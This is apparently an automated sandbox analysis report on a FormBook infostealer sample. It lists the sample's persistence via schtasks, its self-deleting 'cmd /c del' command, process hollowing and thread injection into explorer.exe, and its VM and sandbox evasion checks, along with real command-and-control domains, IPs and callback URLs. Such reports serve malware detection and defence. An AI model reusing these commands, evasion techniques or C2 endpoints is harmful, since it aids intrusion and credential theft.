Source: ejecutable2.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\ejecutable2.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ......................,.........E.R.R.O.R.:. ...d.......`.......................................................x.%.......................,..... Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ......................,.........E.R.R.O.(.P.....d.......`...............................................................X.................,..... Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\ejecutable2.exe 'C:\Users\user\Desktop\ejecutable2.exe'
Source: C:\Users\user\Desktop\ejecutable2.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\CmsVPZkxbOtm' /XML 'C:\Users\user\AppData\Local\Temp\tmp86AE.tmp'
Source: C:\Users\user\Desktop\ejecutable2.exe Process created: C:\Users\user\Desktop\ejecutable2.exe C:\Users\user\Desktop\ejecutable2.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ejecutable2.exe'
Source: C:\Users\user\Desktop\ejecutable2.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\CmsVPZkxbOtm' /XML 'C:\Users\user\AppData\Local\Temp\tmp86AE.tmp' Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Process created: C:\Users\user\Desktop\ejecutable2.exe C:\Users\user\Desktop\ejecutable2.exe Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ejecutable2.exe' Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe File created: C:\Users\user\AppData\Local\Temp\tmp86AE.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@8/3@7/7
Source: C:\Users\user\Desktop\ejecutable2.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: explorer.exe, 00000005.00000000.470780765.0000000002AE0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: ejecutable2.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: ejecutable2.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdb source: ejecutable2.exe, 00000004.00000002.487685735.00000000009D0000.00000040.00000001.sdmp, wscript.exe
Source: Binary string: wscript.pdb source: ejecutable2.exe, 00000004.00000002.486080402.0000000000560000.00000040.00020000.sdmp
Source: Binary string: wscript.pdbN source: ejecutable2.exe, 00000004.00000002.486080402.0000000000560000.00000040.00020000.sdmp

Data Obfuscation:

barindex
.NET source code contains potential unpacker
Source: ejecutable2.exe, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: CmsVPZkxbOtm.exe.0.dr, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.ejecutable2.exe.1120000.0.unpack, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.ejecutable2.exe.1120000.2.unpack, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.ejecutable2.exe.1120000.5.unpack, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_0033E345 push ss; retn 0033h 0_2_0033E34D
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_048C4649 push esp; ret 0_2_048C464A
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_0041B87C push eax; ret 4_2_0041B882
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_0041B812 push eax; ret 4_2_0041B818
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_0041B81B push eax; ret 4_2_0041B882
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_00415B53 push ds; ret 4_2_00415B1C
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_00415B1A push ds; ret 4_2_00415B1C
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_00415CE2 push 81CAEFA2h; retf 4_2_00415CE9
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0239DFA1 push ecx; ret 6_2_0239DFB4
Source: initial sample Static PE information: section name: .text entropy: 6.99221568577
Source: initial sample Static PE information: section name: .text entropy: 6.99221568577

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\Desktop\ejecutable2.exe File created: C:\Users\user\AppData\Roaming\CmsVPZkxbOtm.exe Jump to dropped file

Boot Survival:

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\ejecutable2.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\CmsVPZkxbOtm' /XML 'C:\Users\user\AppData\Local\Temp\tmp86AE.tmp'

Hooking and other Techniques for Hiding and Protection:

barindex
Self deletion via cmd delete
Source: C:\Windows\SysWOW64\wscript.exe Process created: /c del 'C:\Users\user\Desktop\ejecutable2.exe'
Source: C:\Windows\SysWOW64\wscript.exe Process created: /c del 'C:\Users\user\Desktop\ejecutable2.exe' Jump to behavior
Deletes itself after installation
Source: C:\Windows\SysWOW64\cmd.exe File deleted: c:\users\user\desktop\ejecutable2.exe Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 0.2.ejecutable2.exe.262ecec.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.424368944.00000000025F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.424438137.000000000265F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ejecutable2.exe PID: 2548, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: ejecutable2.exe, 00000000.00000002.424368944.00000000025F1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: ejecutable2.exe, 00000000.00000002.424368944.00000000025F1000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\ejecutable2.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ejecutable2.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe RDTSC instruction interceptor: First address: 0000000000078604 second address: 000000000007860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe RDTSC instruction interceptor: First address: 000000000007898E second address: 0000000000078994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\ejecutable2.exe TID: 2576 Thread sleep time: -31446s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe TID: 2652 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 2572 Thread sleep time: -40000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 2680 Thread sleep time: -34000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\wscript.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_004088C0 rdtsc 4_2_004088C0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\ejecutable2.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Thread delayed: delay time: 31446 Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000005.00000000.435228530.0000000000255000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: ejecutable2.exe, 00000000.00000002.424368944.00000000025F1000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: ejecutable2.exe, 00000000.00000002.424368944.00000000025F1000.00000004.00000001.sdmp Binary or memory string: vmware
Source: ejecutable2.exe, 00000000.00000002.424014627.000000000059F000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: explorer.exe, 00000005.00000000.439477133.00000000044E7000.00000004.00000001.sdmp Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
Source: ejecutable2.exe, 00000000.00000002.424368944.00000000025F1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: ejecutable2.exe, 00000000.00000002.424368944.00000000025F1000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_004088C0 rdtsc 4_2_004088C0
Enables debug privileges
Source: C:\Users\user\Desktop\ejecutable2.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023A26F8 mov eax, dword ptr fs:[00000030h] 6_2_023A26F8
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\ejecutable2.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_00409B30 LdrLoadDll, 4_2_00409B30
Source: C:\Users\user\Desktop\ejecutable2.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.branchwallet.com
Source: C:\Windows\explorer.exe Domain query: www.wwiilive.com
Source: C:\Windows\explorer.exe Network Connect: 5.101.152.161 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 35.168.81.157 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 3.223.115.185 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.tunetel.com
Source: C:\Windows\explorer.exe Domain query: www.play-to-escape.com
Source: C:\Windows\explorer.exe Domain query: www.yhomggsmtdynchb.store
Source: C:\Windows\explorer.exe Network Connect: 217.160.0.222 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.iptechcm.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.pizza-mio.com
Source: C:\Windows\explorer.exe Network Connect: 195.77.116.8 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 81.169.145.77 80 Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\ejecutable2.exe Section unmapped: C:\Windows\SysWOW64\wscript.exe base address: AB0000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\ejecutable2.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\ejecutable2.exe Memory written: C:\Users\user\Desktop\ejecutable2.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\ejecutable2.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\ejecutable2.exe Thread register set: target process: 1764 Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Thread register set: target process: 1764 Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Thread register set: target process: 1764 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\ejecutable2.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\CmsVPZkxbOtm' /XML 'C:\Users\user\AppData\Local\Temp\tmp86AE.tmp' Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Process created: C:\Users\user\Desktop\ejecutable2.exe C:\Users\user\Desktop\ejecutable2.exe Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ejecutable2.exe' Jump to behavior
Source: explorer.exe, 00000005.00000000.435228530.0000000000255000.00000004.00000020.sdmp Binary or memory string: ProgmanG

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\ejecutable2.exe Queries volume information: C:\Users\user\Desktop\ejecutable2.exe VolumeInformation Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 4.2.ejecutable2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 4.2.ejecutable2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 491547 Sample: ejecutable2.exe Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 38 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->38 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 7 other signatures 2->44 9 ejecutable2.exe 1 9 2->9         started        process3 file4 28 C:\Users\user\AppData\Local\...\tmp86AE.tmp, XML 9->28 dropped 30 C:\Users\user\AppData\...\CmsVPZkxbOtm.exe, PE32 9->30 dropped 58 Uses schtasks.exe or at.exe to add and modify task schedules 9->58 60 Tries to detect virtualization through RDTSC time measurements 9->60 62 Injects a PE file into a foreign processes 9->62 13 ejecutable2.exe 9->13         started        16 schtasks.exe 9->16         started        signatures5 process6 signatures7 64 Modifies the context of a thread in another process (thread injection) 13->64 66 Maps a DLL or memory area into another process 13->66 68 Sample uses process hollowing technique 13->68 70 Queues an APC in another process (thread injection) 13->70 18 explorer.exe 13->18 injected process8 dnsIp9 32 play-to-escape.com 81.169.145.77, 49172, 80 STRATOSTRATOAGDE Germany 18->32 34 www.pizza-mio.com 217.160.0.222, 49170, 80 ONEANDONE-ASBrauerstrasse48DE Germany 18->34 36 10 other IPs or domains 18->36 46 System process connects to network (likely due to code injection or exploit) 18->46 22 wscript.exe 18->22         started        signatures10 process11 signatures12 48 Self deletion via cmd delete 22->48 50 Modifies the context of a thread in another process (thread injection) 22->50 52 Maps a DLL or memory area into another process 22->52 54 Tries to detect virtualization through RDTSC time measurements 22->54 25 cmd.exe 22->25         started        process13 signatures14 56 Deletes itself after installation 25->56
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
217.160.0.222
 www.pizza-mio.com Germany
8560 ONEANDONE-ASBrauerstrasse48DE true
5.101.152.161
 www.yhomggsmtdynchb.store Russian Federation
198610 BEGET-ASRU true
34.102.136.180
 wwiilive.com United States
15169 GOOGLEUS false
35.168.81.157
 cdl-lb-1356093980.us-east-1.elb.amazonaws.com United States
14618 AMAZON-AESUS false
3.223.115.185
 HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com United States
14618 AMAZON-AESUS false
195.77.116.8
 www.iptechcm.com Spain
60493 FICOSA-ASES true
81.169.145.77
 play-to-escape.com Germany
6724 STRATOSTRATOAGDE true

Contacted Domains

Name IP Active
www.yhomggsmtdynchb.store 5.101.152.161 true
www.iptechcm.com 195.77.116.8 true
play-to-escape.com 81.169.145.77 true
HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com 3.223.115.185 true
www.pizza-mio.com 217.160.0.222 true
wwiilive.com 34.102.136.180 true
cdl-lb-1356093980.us-east-1.elb.amazonaws.com 35.168.81.157 true
www.tunetel.com unknown unknown
www.play-to-escape.com unknown unknown
www.branchwallet.com unknown unknown
www.wwiilive.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.pizza-mio.com/u4an/?cRrtMz2=Ea+fIX+qvB9rXsVioouSESAKF/QLNUis3qIxLYsU8whjNSMesV9wMQUCyx2IDzdIrw8QIA==&an=lnlpiVNpa2ntv true
  • Avira URL Cloud: safe
 unknown
http://www.tunetel.com/u4an/?cRrtMz2=FQD7DOPg41An23BytYAyzDzwyZJ0tQikl+psJg3VSFai3GWkns53TVvYc7bwkTS4QXibfw==&an=lnlpiVNpa2ntv true
  • Avira URL Cloud: safe
 unknown
http://www.wwiilive.com/u4an/?cRrtMz2=2wrG/oaPoZN58JamjsocLLaSsZCLAXvYnHaXxYH/bF19vnAo7muls9VTY9bzjfrYRlsEFw==&an=lnlpiVNpa2ntv false
  • Avira URL Cloud: safe
 unknown
http://www.play-to-escape.com/u4an/?cRrtMz2=wU8NyZPkNGRQQpssl8Iv49O+whrQvSeXFC/S+Kx28E86ZZkWNSugarjcLE+3raO3NGyltw==&an=lnlpiVNpa2ntv true
  • Avira URL Cloud: safe
 unknown
http://www.yhomggsmtdynchb.store/u4an/?cRrtMz2=vtjrYftuZe8iaBtQ/TWxrabmNpKe1jOOTYTB1/nX+Um4K24Q/B9FUBqnYP2A+q8J0+YELg==&an=lnlpiVNpa2ntv true
  • Avira URL Cloud: safe
 unknown
http://www.branchwallet.com/u4an/?cRrtMz2=bje5eY1RGEWNtm8ygCOrlm2ug1qlHU7639KaGd4GF1Wfo4/TJzpT6n4yoGbd2Lg1L0Vz5w==&an=lnlpiVNpa2ntv true
  • Avira URL Cloud: safe
 unknown
http://www.iptechcm.com/u4an/?cRrtMz2=Xsze89gQxfgRrb0U/pbtTMTkEZR7VVn3wnJWYt+8gVFiExqV2mQQrtUEc4jTVg5kW61b5Q==&an=lnlpiVNpa2ntv true
  • Avira URL Cloud: safe
 unknown
www.wwiilive.com/u4an/ true
  • Avira URL Cloud: safe
 low